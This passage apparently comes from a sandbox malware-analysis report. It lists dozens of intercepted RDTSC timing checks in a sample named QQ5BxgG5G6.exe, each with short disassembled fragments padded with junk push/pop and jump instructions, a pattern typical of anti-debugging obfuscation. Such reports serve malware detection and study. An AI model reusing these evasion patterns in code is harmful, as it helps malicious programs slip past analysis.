              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EFC1CD second address: EFC1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD041h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EFC1E4 second address: EFC1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EFC1E9 second address: EFC205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD047h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EFC205 second address: EFC20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EFC4CF second address: EFC4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EFC8D9 second address: EFC8E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F88DD0CB152h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EFC8E9 second address: EFC8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EFC8EF second address: EFC8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 ja 00007F88DD0CB146h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EFCBEA second address: EFCC06 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F88DC6CD036h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F88DC6CD040h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFCC06 second address: EFCC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F88DD0CB146h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F88DD0CB151h 0x00000010 popad 0x00000011 jbe 00007F88DD0CB162h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EF558B second address: EF55A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD045h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFD9EA second address: EFD9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFD9EF second address: EFD9F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFD9F6 second address: EFD9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFDF8B second address: EFDF9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F88DC6CD036h 0x0000000a jns 00007F88DC6CD036h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F03B49 second address: F03B4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0904F second address: F09053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F084CD second address: F084D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F084D1 second address: F084D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0860D second address: F0862A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB152h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0862A second address: F08630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F08630 second address: F0863A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F087AF second address: F087BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F087BB second address: F087C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F087C3 second address: F087E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DC6CD03Ah 0x00000009 jmp 00007F88DC6CD043h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F087E4 second address: F087F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F08DCB second address: F08DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F08DD1 second address: F08DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0A71A second address: F0A71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0A71E second address: F0A728 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F88DD0CB146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0A728 second address: F0A72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0A72E second address: F0A744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB151h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EBFC99 second address: EBFC9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0DC97 second address: F0DCA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F88DD0CB146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0DF79 second address: F0DFA1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F88DC6CD03Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F88DC6CD045h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E16E second address: F0E172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E172 second address: F0E176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E42D second address: F0E443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F88DD0CB148h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E443 second address: F0E447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E447 second address: F0E45A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E88A second address: F0E8A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD044h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E919 second address: F0E91D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0EEA4 second address: F0EEE2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F88DC6CD03Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F88DC6CD038h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D39AEh] 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0EEE2 second address: F0EEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0FE07 second address: F0FE38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and si, 8EC3h 0x00000010 and di, 3803h 0x00000015 push 00000000h 0x00000017 jp 00007F88DC6CD03Bh 0x0000001d push 00000000h 0x0000001f mov esi, ecx 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jl 00007F88DC6CD03Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0FC67 second address: F0FC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0FE38 second address: F0FE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0FC6B second address: F0FC83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F10FE4 second address: F10FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F10FEA second address: F11064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F88DD0CB14Ch 0x0000000a popad 0x0000000b push eax 0x0000000c jg 00007F88DD0CB14Ah 0x00000012 nop 0x00000013 mov esi, ecx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F88DD0CB148h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 movsx esi, si 0x00000034 mov edi, dword ptr [ebp+122D2BA1h] 0x0000003a push 00000000h 0x0000003c jo 00007F88DD0CB14Bh 0x00000042 and si, 5C3Dh 0x00000047 xchg eax, ebx 0x00000048 jmp 00007F88DD0CB152h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jnl 00007F88DD0CB148h 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1071A second address: F1071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F11064 second address: F11069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F117D5 second address: F117E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1230A second address: F1230E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F12FB2 second address: F13021 instructions: 0x00000000 rdtsc 0x00000002 js 00007F88DC6CD03Ch 0x00000008 jg 00007F88DC6CD036h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007F88DC6CD03Eh 0x00000017 push edi 0x00000018 jmp 00007F88DC6CD03Eh 0x0000001d pop edi 0x0000001e popad 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F88DC6CD038h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000019h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c mov esi, dword ptr [ebp+1247AF76h] 0x00000042 push 00000000h 0x00000044 jmp 00007F88DC6CD03Dh 0x00000049 xchg eax, ebx 0x0000004a pushad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F13B01 second address: F13B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F88DD0CB14Ch 0x0000000a jng 00007F88DD0CB146h 0x00000010 popad 0x00000011 push eax 0x00000012 push ecx 0x00000013 pushad 0x00000014 jnl 00007F88DD0CB146h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F13B1D second address: F13B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F88DC6CD038h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D2DD6h], edx 0x00000027 push 00000000h 0x00000029 mov edi, ecx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F88DC6CD038h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 mov di, 05A0h 0x0000004b xchg eax, ebx 0x0000004c ja 00007F88DC6CD04Dh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push esi 0x00000056 pushad 0x00000057 popad 0x00000058 pop esi 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F13879 second address: F1387F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1387F second address: F13892 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F88DC6CD036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F13892 second address: F1389C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F88DD0CB146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EBE172 second address: EBE17E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F88DC6CD036h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EBE17E second address: EBE182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F19339 second address: F1933F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC335B second address: EC335F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC335F second address: EC3386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD046h 0x00000007 jng 00007F88DC6CD036h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC3386 second address: EC338A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC338A second address: EC338E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC338E second address: EC3394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F19968 second address: F199C3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F88DC6CD03Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F88DC6CD038h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F88DC6CD038h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 push eax 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1BA8A second address: F1BA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1BA8E second address: F1BA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1BA92 second address: F1BAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jp 00007F88DD0CB146h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1BAA9 second address: F1BAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1FA11 second address: F1FABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F88DD0CB148h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov ebx, 1B6D51C1h 0x0000002e sub dword ptr [ebp+122D17E7h], eax 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F88DD0CB148h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 mov dword ptr [ebp+124590B5h], ecx 0x00000056 mov edi, dword ptr [ebp+122D19E2h] 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 jmp 00007F88DD0CB158h 0x00000065 jmp 00007F88DD0CB159h 0x0000006a popad 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1FABB second address: F1FAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1FAC1 second address: F1FAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1FC0F second address: F1FC13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F217CB second address: F21818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 ja 00007F88DD0CB14Ch 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F88DD0CB148h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D28D4h], eax 0x0000002f push 00000000h 0x00000031 mov bx, cx 0x00000034 push 00000000h 0x00000036 sub dword ptr [ebp+124804A4h], eax 0x0000003c or bl, FFFFFFC4h 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F23A39 second address: F23A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F23A3D second address: F23A53 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F88DD0CB146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F88DD0CB166h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F24C2A second address: F24C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F24C2E second address: F24C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
